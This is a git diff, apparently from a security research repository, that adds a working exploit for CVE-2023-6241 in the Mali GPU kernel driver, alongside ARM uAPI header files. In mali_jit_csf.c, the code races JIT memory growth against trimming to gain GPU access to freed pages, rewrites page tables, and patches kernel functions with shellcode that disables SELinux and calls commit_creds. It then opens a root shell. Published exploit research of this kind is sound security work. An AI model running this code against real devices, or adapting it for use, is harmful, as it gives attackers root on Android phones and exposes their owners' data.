alias, in pages. 
For BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * specifies the number of times the special page is needed. + * + * Describes a memory handle to be aliased. + * A subset of the handle can be chosen for aliasing, given an offset and a + * length. + * A special handle BASE_MEM_WRITE_ALLOC_PAGES_HANDLE is used to represent a + * region where a special page is mapped with a write-alloc cache setup, + * typically used when the write result of the GPU isn't needed, but the GPU + * must write anyway. + * + * Offset and length are specified in pages. + * Offset must be within the size of the handle. + * Offset+length must not overrun the size of the handle. + */ +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +/* Maximum percentage of just-in-time memory allocation trimming to perform + * on free. + */ +#define BASE_JIT_MAX_TRIM_LEVEL (100) + +/* Maximum number of concurrent just-in-time memory allocations. + */ +#define BASE_JIT_ALLOC_COUNT (255) + +/* base_jit_alloc_info in use for kernel driver versions 10.2 to early 11.5 + * + * jit_version is 1 + * + * Due to the lack of padding specified, user clients between 32 and 64-bit + * may have assumed a different size of the struct + * + * An array of structures was not supported + */ +struct base_jit_alloc_info_10_2 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; +}; + +/* base_jit_alloc_info introduced by kernel driver version 11.5, and in use up + * to 11.19 + * + * This structure had a number of modifications during and after kernel driver + * version 11.5, but remains size-compatible throughout its version history, and + * with earlier variants compatible with future variants by requiring + * zero-initialization to the unused space in the structure. + * + * jit_version is 2 + * + * Kernel driver version history: + * 11.5: Initial introduction with 'usage_id' and padding[5]. All padding bytes + * must be zero. Kbase minor version was not incremented, so some + * versions of 11.5 do not have this change. + * 11.5: Added 'bin_id' and 'max_allocations', replacing 2 padding bytes (Kbase + * minor version not incremented) + * 11.6: Added 'flags', replacing 1 padding byte + * 11.10: Arrays of this structure are supported + */ +struct base_jit_alloc_info_11_5 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; +}; + +/** + * struct base_jit_alloc_info - Structure which describes a JIT allocation + * request. + * @gpu_alloc_addr: The GPU virtual address to write the JIT + * allocated GPU virtual address to. + * @va_pages: The minimum number of virtual pages required. + * @commit_pages: The minimum number of physical pages which + * should back the allocation. + * @extension: Granularity of physical pages to grow the + * allocation by during a fault. + * @id: Unique ID provided by the caller, this is used + * to pair allocation and free requests. + * Zero is not a valid value. + * @bin_id: The JIT allocation bin, used in conjunction with + * @max_allocations to limit the number of each + * type of JIT allocation. + * @max_allocations: The maximum number of allocations allowed within + * the bin specified by @bin_id. Should be the same + * for all allocations within the same bin. 
+ * @flags: flags specifying the special requirements for + * the JIT allocation, see + * %BASE_JIT_ALLOC_VALID_FLAGS + * @padding: Expansion space - should be initialised to zero + * @usage_id: A hint about which allocation should be reused. + * The kernel should attempt to use a previous + * allocation with the same usage_id + * @heap_info_gpu_addr: Pointer to an object in GPU memory describing + * the actual usage of the region. + * + * jit_version is 3. + * + * When modifications are made to this structure, it is still compatible with + * jit_version 3 when: a) the size is unchanged, and b) new members only + * replace the padding bytes. + * + * Previous jit_version history: + * jit_version == 1, refer to &base_jit_alloc_info_10_2 + * jit_version == 2, refer to &base_jit_alloc_info_11_5 + * + * Kbase version history: + * 11.20: added @heap_info_gpu_addr + */ +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +enum base_external_resource_access { + BASE_EXT_RES_ACCESS_SHARED, + BASE_EXT_RES_ACCESS_EXCLUSIVE +}; + +struct base_external_resource { + __u64 ext_resource; +}; + +/** + * BASE_EXT_RES_COUNT_MAX - The maximum number of external resources + * which can be mapped/unmapped in a single request. + */ +#define BASE_EXT_RES_COUNT_MAX 10 + +/** + * struct base_external_resource_list - Structure which describes a list of + * external resources. + * @count: The number of resources. + * @ext_res: Array of external resources which is + * sized at allocation time. + */ +struct base_external_resource_list { + __u64 count; + struct base_external_resource ext_res[1]; +}; + +#endif /* _UAPI_BASE_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c new file mode 100644 index 0000000..724d031 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c @@ -0,0 +1,435 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include + +//From https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17 +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define MALI "/dev/mali0" + +//#define GROW_SIZE 0x2000 + +#define GROW_SIZE (0x2000 - 10) + +#define FREED_NUM 1 + +#define JIT_SIZE 0x23d0 + +#define FAULT_SIZE 0x300 + +#define PTE_PAGES 0x200 + +#define PTE_SIZE (PTE_PAGES << 12) + +#define TEST_VAL 0x42424242 + +#define THRESHOLD 0x2300 + +#define REUSE_REG_SIZE 0x100 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + +uint64_t reused_regions[REUSE_REG_SIZE] = {0}; + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2311; + +static uint64_t avc_deny = AVC_DENY_2311; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +int find_mali_fd() { + int test_fd = open("/dev/null", O_RDWR); + char 
file_path[256]; + char proc_string[256]; + for (int i = 3; i < test_fd; i++) { + sprintf(proc_string, "/proc/self/fd/%d", i); + if(readlink(proc_string, file_path, 256) > 0) { + if (strcmp(file_path, MALI) == 0) { + close(test_fd); + return i; + } + } + } + close(test_fd); + return -1; +} + +void setup_mali(int fd, int group_id) { + + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + LOG("major %d\n", param.major); + err(1, "version check failed\n"); + } + + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void mem_query(int fd, union kbase_ioctl_mem_query* query) { + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) { + err(1, "mem_query failed\n"); + } +} + +void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { + struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages}; + if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) { + LOG("commit failed\n"); + } +} + +uint64_t get_mem_size(int fd, uint64_t gpu_addr) { + union kbase_ioctl_mem_query query = {0}; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + query.in.gpu_addr = gpu_addr; + mem_query(fd, &query); + return query.out.value; +} + +void queue_register(int fd, uint64_t queue_addr, uint32_t queue_pages) { + struct kbase_ioctl_cs_queue_register reg = {0}; + reg.buffer_gpu_addr = queue_addr; + reg.buffer_size = queue_pages; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_REGISTER, ®) < 0) { + err(1, "register queue failed\n"); + } +} + +uint64_t queue_bind(int fd, uint64_t queue_addr, uint8_t group_handle, uint8_t csi_index) { + union kbase_ioctl_cs_queue_bind bind = {0}; + bind.in.buffer_gpu_addr = queue_addr; + bind.in.group_handle = group_handle; + bind.in.csi_index = csi_index; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_BIND, &bind) < 0) { + err(1, "bind queue failed\n"); + } + return bind.out.mmap_handle; +} + +uint8_t kcpu_queue_new(int fd) { + struct kbase_ioctl_kcpu_queue_new queue_new = {0}; + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_CREATE, &queue_new) < 0) { + err(1, "kcpu queue create failed\n"); + } + return queue_new.id; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t queue_id, uint8_t jit_id, uint64_t va_pages, uint64_t commit_pages, uint8_t bin_id, uint16_t usage_id, uint64_t gpu_alloc_addr) { + *((uint64_t*)gpu_alloc_addr) = 0; + struct base_jit_alloc_info info = {0}; + info.id = jit_id; + info.gpu_alloc_addr = gpu_alloc_addr; + info.va_pages = va_pages; + info.commit_pages = commit_pages; + info.extension = 1; + info.bin_id = bin_id; + info.usage_id = usage_id; + + struct base_kcpu_command_jit_alloc_info jit_alloc_info = {0}; + jit_alloc_info.info = (uint64_t)(&info); + jit_alloc_info.count = 1; + struct base_kcpu_command cmd = {0}; + cmd.info.jit_alloc = jit_alloc_info; + cmd.type = BASE_KCPU_COMMAND_TYPE_JIT_ALLOC; + struct kbase_ioctl_kcpu_queue_enqueue enq = {0}; + enq.id = 
queue_id; + enq.nr_commands = 1; + enq.addr = (uint64_t)(&cmd); + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &enq) < 0) { + err(1, "jit allocate failed\n"); + } + volatile uint64_t ret = *((uint64_t*)gpu_alloc_addr); + while (ret == 0) { + ret = *((uint64_t*)gpu_alloc_addr); + } + return ret; +} + +void jit_free(int fd, uint8_t queue_id, uint8_t jit_id) { + uint8_t free_id = jit_id; + struct base_kcpu_command_jit_free_info info = {0}; + info.ids = (uint64_t)(&free_id); + info.count = 1; + struct base_kcpu_command cmd = {0}; + cmd.info.jit_free = info; + cmd.type = BASE_KCPU_COMMAND_TYPE_JIT_FREE; + struct kbase_ioctl_kcpu_queue_enqueue enq = {0}; + enq.id = queue_id; + enq.nr_commands = 1; + enq.addr = (uint64_t)(&cmd); + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &enq) < 0) { + err(1, "jit free failed\n"); + } +} + +void* jit_grow(void* args) { + uint64_t* arguments = (uint64_t*)args; + int mali_fd = arguments[0]; + int qid = arguments[1]; + int jit_id = arguments[2]; + uint64_t gpu_alloc_addr = arguments[3]; + uint64_t addr = jit_allocate(mali_fd, qid, jit_id, JIT_SIZE, GROW_SIZE, 1, 1, gpu_alloc_addr); + LOG("jit_grow addr %lx\n", addr); + return NULL; +} + +void create_reuse_regions(int mali_fd, uint64_t* reuse_regions, size_t size) { + for (int i = 0; i < size; i++) { + reuse_regions[i] = (uint64_t)map_gpu(mali_fd, 1, 1, false, 0); + memset((void*)(reused_regions[i]), 0, 0x1000); + } +} + +uint64_t find_reused_page(uint64_t* reuse_regions, size_t size) { + for (int i = 0; i < size; i++) { + uint64_t* region_start = (uint64_t*)(reused_regions[i]); + for (int j = 0; j < 0x1000/sizeof(uint64_t); j++) { + if (region_start[j] == TEST_VAL) { + LOG("found reused page %lx, %d\n", (uint64_t)region_start, j); + return (uint64_t)region_start; + } + } + } + return -1; +} + +int find_pgd(int mali_fd, uint64_t gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel, uint64_t* out) { + int ret = -1; + uint64_t read_addr = gpu_addr; + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = read_from(mali_fd, &read_addr, command_queue, kernel); + read_addr += 8; + if ((entry & 0x443) == 0x443) { + *out = entry; + return i; + } + } + return ret; +} + +void write_shellcode(int mali_fd, uint64_t pgd, uint64_t* reserved, cl_command_queue command_queue, struct rw_mem_kernel* kernel, struct rw_mem_kernel* kernel32) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + uint64_t overwrite_index = pgd + OVERWRITE_INDEX * sizeof(uint64_t); + write_to(mali_fd, &overwrite_index, &avc_deny_addr, command_queue, kernel); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, &overwrite_index, &sel_read_enforce_addr, command_queue, kernel); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + fixup_root_shell(INIT_CRED_2311, COMMIT_CREDS_2311, SEL_READ_ENFORCE_2311, 
ADD_INIT_2311, ADD_COMMIT_2311, &(root_code[0])); + cl_platform_id platform_id = NULL; + cl_device_id device_id = NULL; + cl_uint ret_num_devices; + cl_uint ret_num_platforms; + + cl_int ret = clGetPlatformIDs(1, &platform_id, &ret_num_platforms); + if (ret != CL_SUCCESS) { + err(1, "fail to get platform\n"); + } + int mali_fd = find_mali_fd(); + LOG("mali_fd %d\n", mali_fd); + + uint8_t qid = kcpu_queue_new(mali_fd); + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + memset(gpu_alloc_addr, 0, 0x1000); + + uint64_t test_jit_id = 1; + uint64_t test_jit_addr = jit_allocate(mali_fd, qid, test_jit_id, 1, 0, 0, 0, (uint64_t)gpu_alloc_addr); + uint64_t remainder = test_jit_addr % PTE_SIZE; + if (remainder) { + test_jit_id++; + jit_allocate(mali_fd, qid, test_jit_id, (PTE_PAGES + 1 - (remainder >> 12)), 0, 0, 0, (uint64_t)gpu_alloc_addr); + } + + uint64_t corrupted_jit_id = test_jit_id + 1; + uint64_t second_jit_id = corrupted_jit_id + 1; + + uint64_t corrupted_jit_addr = jit_allocate(mali_fd, qid, corrupted_jit_id, JIT_SIZE, 1, 1, 1, (uint64_t)gpu_alloc_addr); + + LOG("corrupted_jit_addr %lx\n", corrupted_jit_addr); + + jit_free(mali_fd, qid, corrupted_jit_id); + + ret = clGetDeviceIDs( platform_id, CL_DEVICE_TYPE_DEFAULT, 1, + &device_id, &ret_num_devices); + if (ret != CL_SUCCESS) { + err(1, "fail to get Device ID\n"); + } + + cl_context context = clCreateContext( NULL, 1, &device_id, NULL, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create context\n"); + } + + cl_command_queue command_queue = clCreateCommandQueueWithProperties(context, device_id, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create command_queue\n"); + } + + + uint64_t write_addr = corrupted_jit_addr + FAULT_SIZE * 0x1000; + uint64_t value = 32; + uint64_t write = 1; + + struct rw_mem_kernel kernel = create_rw_mem(context, &device_id, true); + struct rw_mem_kernel kernel32 = create_rw_mem(context, &device_id, false); + + ret = clEnqueueWriteBuffer(command_queue, kernel.va, CL_TRUE, 0, sizeof(uint64_t), &write_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel.in_out, CL_TRUE, 0, sizeof(uint64_t), &value, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel.flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + LOG("queue kernel\n"); + pthread_t thread; + uint64_t args[4]; + args[0] = mali_fd; + args[1] = qid; + args[2] = corrupted_jit_id; + args[3] = (uint64_t)gpu_alloc_addr; + + pthread_create(&thread, NULL, &jit_grow, (void*)&(args[0])); + ret = clEnqueueNDRangeKernel(command_queue, kernel.kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + usleep(10000); + ret = clFlush(command_queue); + + pthread_join(thread, NULL); + uint64_t region_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Size after grow: %lx\n", region_size); + + write_addr = corrupted_jit_addr + (FAULT_SIZE + GROW_SIZE + 0xd0) * 0x1000; + write_to(mali_fd, &write_addr, &value, command_queue, &kernel); + + uint64_t final_grow_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Final grow size: %lx\n", final_grow_size); + + uint64_t keep_alive_jit_addr = jit_allocate(mali_fd, qid, second_jit_id + 1, 10, 10, 0, 0, (uint64_t)gpu_alloc_addr); + LOG("keep alive jit_addr %lx\n", keep_alive_jit_addr); + + jit_free(mali_fd, qid, corrupted_jit_id); + 
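/* jit_free() only enqueues a JIT_FREE command on the KCPU queue, so the
+ free (and the trimming of the grown region) happens asynchronously; the
+ short sleep below gives it time to complete before the trimmed size is
+ read back with get_mem_size(). */
+ 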
usleep(10000); + uint64_t trimmed_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Size after free: %lx, trim_level %lu\n", trimmed_size, 100 - (trimmed_size * 100)/final_grow_size); + + uint64_t reclaim_addr = jit_allocate(mali_fd, qid, corrupted_jit_id, JIT_SIZE, trimmed_size, 1, 1, (uint64_t)gpu_alloc_addr); + if (reclaim_addr != corrupted_jit_addr) { + err(1, "Inconsistent address when reclaiming freed jit region %lx %lx\n", reclaim_addr, corrupted_jit_addr); + } + + create_reuse_regions(mali_fd, &(reused_regions[0]), REUSE_REG_SIZE); + + value = TEST_VAL; + write_addr = corrupted_jit_addr + (THRESHOLD) * 0x1000; + LOG("writing to gpu_va %lx\n", write_addr); + write_to(mali_fd, &write_addr, &value, command_queue, &kernel); + + uint64_t reused_addr = find_reused_page(&(reused_regions[0]), REUSE_REG_SIZE); + if (reused_addr == -1) { + err(1, "Cannot find reused page\n"); + } + reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + mem_commit(mali_fd, reused_addr, 0); + map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + + uint64_t entry = 0; + int res = find_pgd(mali_fd, write_addr, command_queue, &kernel, &entry); + if (res == -1) { + err(1, "Cannot find page table entry\n"); + } + LOG("pgd entry found at index %d %lx\n", res, entry); + + write_shellcode(mali_fd, write_addr, &(reserved[0]), command_queue, &kernel, &kernel32); + run_enforce(); + cleanup(mali_fd, write_addr, command_queue, &kernel); + + ret = clFinish(command_queue); + releaseKernel(&kernel); + releaseKernel(&kernel32); + ret = clReleaseCommandQueue(command_queue); + ret = clReleaseContext(context); + system("sh"); + } diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h new file mode 100644 index 0000000..91249ca --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h @@ -0,0 +1,556 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_CSF_IOCTL_H_ +#define _UAPI_KBASE_CSF_IOCTL_H_ + +#include +#include + +/* + * 1.0: + * - CSF IOCTL header separated from JM + * 1.1: + * - Add a new priority level BASE_QUEUE_GROUP_PRIORITY_REALTIME + * - Add ioctl 54: This controls the priority setting. 
+ * 1.2: + * - Add new CSF GPU_FEATURES register into the property structure + * returned by KBASE_IOCTL_GET_GPUPROPS + * 1.3: + * - Add __u32 group_uid member to + * &struct_kbase_ioctl_cs_queue_group_create.out + * 1.4: + * - Replace padding in kbase_ioctl_cs_get_glb_iface with + * instr_features member of same size + * 1.5: + * - Add ioctl 40: kbase_ioctl_cs_queue_register_ex, this is a new + * queue registration call with extended format for supporting CS + * trace configurations with CSF trace_command. + * 1.6: + * - Added new HW performance counters interface to all GPUs. + * 1.7: + * - Added reserved field to QUEUE_GROUP_CREATE ioctl for future use + * 1.8: + * - Removed Kernel legacy HWC interface + * 1.9: + * - Reorganization of GPU-VA memory zones, including addition of + * FIXED_VA zone and auto-initialization of EXEC_VA zone. + * - Added new Base memory allocation interface + * 1.10: + * - First release of new HW performance counters interface. + * 1.11: + * - Dummy model (no mali) backend will now clear HWC values after each sample + * 1.12: + * - Added support for incremental rendering flag in CSG create call + * 1.13: + * - Added ioctl to query a register of USER page. + * 1.14: + * - Added support for passing down the buffer descriptor VA in tiler heap init + */ + +#define BASE_UK_VERSION_MAJOR 1 +#define BASE_UK_VERSION_MINOR 14 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + +/** + * struct kbase_ioctl_cs_queue_register - Register a GPU command queue with the + * base back-end + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * + * Note: There is an identical sub-section in kbase_ioctl_cs_queue_register_ex. + * Any change of this struct should also be mirrored to the latter. 
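+ *
+ * Usage sketch, mirroring queue_register() in mali_jit_csf.c:
+ *
+ *   struct kbase_ioctl_cs_queue_register reg = {0};
+ *   reg.buffer_gpu_addr = buffer_gpu_addr;
+ *   reg.buffer_size = buffer_size;
+ *   ioctl(fd, KBASE_IOCTL_CS_QUEUE_REGISTER, &reg);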
+ */ +struct kbase_ioctl_cs_queue_register { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER \ + _IOW(KBASE_IOCTL_TYPE, 36, struct kbase_ioctl_cs_queue_register) + +/** + * struct kbase_ioctl_cs_queue_kick - Kick the GPU command queue group scheduler + * to notify that a queue has been updated + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_kick { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_KICK \ + _IOW(KBASE_IOCTL_TYPE, 37, struct kbase_ioctl_cs_queue_kick) + +/** + * union kbase_ioctl_cs_queue_bind - Bind a GPU command queue to a group + * + * @in: Input parameters + * @in.buffer_gpu_addr: GPU address of the buffer backing the queue + * @in.group_handle: Handle of the group to which the queue should be bound + * @in.csi_index: Index of the CSF interface the queue should be bound to + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.mmap_handle: Handle to be used for creating the mapping of CS + * input/output pages + */ +union kbase_ioctl_cs_queue_bind { + struct { + __u64 buffer_gpu_addr; + __u8 group_handle; + __u8 csi_index; + __u8 padding[6]; + } in; + struct { + __u64 mmap_handle; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_BIND \ + _IOWR(KBASE_IOCTL_TYPE, 39, union kbase_ioctl_cs_queue_bind) + +/** + * struct kbase_ioctl_cs_queue_register_ex - Register a GPU command queue with the + * base back-end in extended format, + * involving trace buffer configuration + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * @ex_offset_var_addr: GPU address of the trace buffer write offset variable + * @ex_buffer_base: Trace buffer GPU base address for the queue + * @ex_buffer_size: Size of the trace buffer in bytes + * @ex_event_size: Trace event write size, in log2 designation + * @ex_event_state: Trace event states configuration + * @ex_padding: Currently unused, must be zero + * + * Note: There is an identical sub-section at the start of this struct to that + * of @ref kbase_ioctl_cs_queue_register. Any change of this sub-section + * must also be mirrored to the latter. Following the said sub-section, + * the remaining fields forms the extension, marked with ex_*. + */ +struct kbase_ioctl_cs_queue_register_ex { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; + __u64 ex_offset_var_addr; + __u64 ex_buffer_base; + __u32 ex_buffer_size; + __u8 ex_event_size; + __u8 ex_event_state; + __u8 ex_padding[2]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER_EX \ + _IOW(KBASE_IOCTL_TYPE, 40, struct kbase_ioctl_cs_queue_register_ex) + +/** + * struct kbase_ioctl_cs_queue_terminate - Terminate a GPU command queue + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_terminate { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 41, struct kbase_ioctl_cs_queue_terminate) + +/** + * union kbase_ioctl_cs_queue_group_create_1_6 - Create a GPU command queue + * group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. 
+ * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. + */ +union kbase_ioctl_cs_queue_group_create_1_6 { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 padding[3]; + + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE_1_6 \ + _IOWR(KBASE_IOCTL_TYPE, 42, union kbase_ioctl_cs_queue_group_create_1_6) + +/** + * union kbase_ioctl_cs_queue_group_create - Create a GPU command queue group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.csi_handlers: Flags to signal that the application intends to use CSI + * exception handlers in some linear buffers to deal with + * the given exception types. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. 
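+ *
+ * Minimal creation sketch (the mask and count values here are
+ * illustrative, not required settings):
+ *
+ *   union kbase_ioctl_cs_queue_group_create create = {0};
+ *   create.in.tiler_mask = ~0ULL;
+ *   create.in.fragment_mask = ~0ULL;
+ *   create.in.compute_mask = ~0ULL;
+ *   create.in.cs_min = 1;
+ *   ioctl(fd, KBASE_IOCTL_CS_QUEUE_GROUP_CREATE, &create);
+ *   (the new handle is returned in create.out.group_handle)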
